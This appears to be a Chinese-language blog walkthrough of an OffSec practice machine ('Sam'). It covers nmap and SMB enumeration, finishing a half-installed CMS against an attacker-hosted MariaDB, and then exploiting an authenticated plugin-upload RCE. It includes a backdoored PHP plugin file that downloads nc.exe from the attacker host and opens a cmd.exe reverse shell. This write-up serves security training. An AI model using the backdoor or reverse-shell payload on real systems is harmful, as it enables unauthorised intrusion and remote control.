从零开始的windows生活-sam

Y callamos a los que hablan, en voz alta en el cine

Tomamos fotos a los que orinan, orinan en calles

在此之前先吐槽一下offsec的官方vpn，真的是差到极点，就算挂了代理ping不通靶机是常态，ping通了几百ms更是常态，就非得逼着你用他们自己的内置kali呗。

靶机IP：192.168.61.248

信息收集

nmap全端口扫描：

??(root?kali)-[/home/kali/Desktop]
??# nmap -p- 192.168.61.248
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-07 08:57 UTC
Nmap scan report for 192.168.61.248
Host is up (0.00044s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
445/tcp  open  microsoft-ds
3306/tcp open  mysql
7680/tcp open  pando-pub

nmap详细扫描：

???(root?kali)-[/home/kali/Desktop]
??# nmap -A -sV -sC -p80,443,445,3306,7680 192.168.61.248
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-07 09:09 UTC
Nmap scan report for 192.168.61.248
Host is up (0.00054s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/7.3.29)
|_http-title: Sam Elliot | Web Designer
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
443/tcp  open  ssl/http      Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/7.3.29)
|_http-title: Sam Elliot | Web Designer
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
3306/tcp open  mysql         MariaDB 10.3.24 or later (unauthorized)
7680/tcp open  pando-pub?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10|11|2019 (97%)
OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Microsoft Windows 10 1903 - 21H1 (97%), Microsoft Windows 10 1803 (95%), Microsoft Windows 11 (92%), Microsoft Windows 10 1909 (91%), Microsoft Windows 10 1909 - 2004 (91%), Windows Server 2019 (91%), Microsoft Windows 10 1809 (91%), Microsoft Windows 10 20H2 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2026-01-07T09:10:08
|_  start_date: N/A

TRACEROUTE (using port 443/tcp)
HOP RTT     ADDRESS
1   0.21 ms 192.168.49.1
2   0.50 ms 192.168.61.248

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.24 seconds

访问80端口，得到一个web页面

dirsearch扫描

smb枚举

1 2	`nxc smb 192.168.61.248 SMB 192.168.61.248 445 SAMS-PC [*] Windows 10 / Server 2019 Build 19041 (name:SAMS-PC) (domain:Sams-PC) (signing:False) (SMBv1:False)`

smbclient无法匿名登录。

smbclient -L //192.168.61.248
Password for [WORKGROUP\root]:
session setup failed: NT_STATUS_ACCESS_DENIED

不过feroxbuster的扫描结果暴露出一个cms。搜了一下有一个RCE

但是看了一眼相关的介绍发现要登录进去才能用，现在还没找到密码。

。。。。看来这个cms还没安装完，我还得帮他装好才能RCE

问题是，这个cms需要别人的sql数据库才能装，也就是说，显得在自己的机器上装好mysql，然后让cms连到我们的机器上。

1	`apt install mariadb-server -y`

sudo systemctl enable --now mariadb
Synchronizing state of mariadb.service with SysV service script with /usr/lib/systemd/systemd-sysv-install.
Executing: /usr/lib/systemd/systemd-sysv-install enable mariadb
Created symlink '/etc/systemd/system/multi-user.target.wants/mariadb.service' ? '/usr/lib/systemd/system/mariadb.service'.

??(root?kali)-[/home/kali/Desktop]
??# sudo mysql
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 42
Server version: 11.8.5-MariaDB-3 from Debian -- Please help get to 10k stars at https://github.com/MariaDB/Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>

MariaDB [(none)]> CREATE DATABASE schlixdb;
Query OK, 1 row affected (0.000 sec)
MariaDB [(none)]> CREATE USER 'kaada'@'%' IDENTIFIED BY '123456';
Query OK, 0 rows affected (0.002 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON schlixdb.* TO 'kaada'@'%';
Query OK, 0 rows affected (0.002 sec)
MariaDB [(none)]> FLUSH PRIVILEGES;
Query OK, 0 rows affected (0.000 sec)
MariaDB [(none)]>

这一步要在 /etc/mysql/mariadb.conf.d/50-server.cnf把地址改为0.0.0.0

之后记得把防火墙的3306端口打开。

一切设置好了现在应该是这样的

经过千难万险，终于。

第三步需要你填域名和密码，我这里直接随便填了

终于，我们可以愉快的RCE了。

==> Tutorial <==

1- Login with your account.
2- Go to the block management section. Directory is '/admin/app/core.blockmanager'.
3- Create a new category.
4- Download the 'mailchimp' extension from here. => https://github.com/calip/app_mailchimp
5- Open the 'packageinfo.inc' file. It is in '/blocks/mailchimp' directory.
6- Paste this PHP code below and save it.
#####################################
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";

?>
#####################################

7- Compress the file to ZIP and rename it 'combo_mailchimp-1_0_1'.
8- Install a package to created category and enter the installed 'mailchimp' extension.
9- Click the 'About' tab and our php code will be executed.

==> Vulnerable 'packageinfo.inc' file. (mailchimp Extension) <==

需要注意的是需要将这个仓库直接clone下来。

再提醒一句，应该压缩的是app_mailchimp下面的整个文件夹。（有位老哥也被这么坑过）

finally。

接下来就是反弹shell了，这个b靶机真折磨人。

<?php
$name = 'mailchimp';
$type = 'block';
$guid = '860e9d79-c5d0-37e4-894e-cdc19d06c7c3';
$version = '1.0';
$license = 'MIT';
$description = 'Mailchimp Backdoor';
$author = 'Alip';
$url = 'https://github.com/calip/app_mailchimp';
$email = 'asalip.putra@gmail.com';
$copyright = 'Copyright &copy;2019 calip';

$command = shell_exec('mkdir c:\pwn && powershell.exe wget "http://192.168.49.61/nc.exe" -outfile "c:\pwn\nc.exe" && c:\pwn\nc.exe -e cmd.exe 192.168.49.61 4444');
echo "<pre>$command</pre>";

?>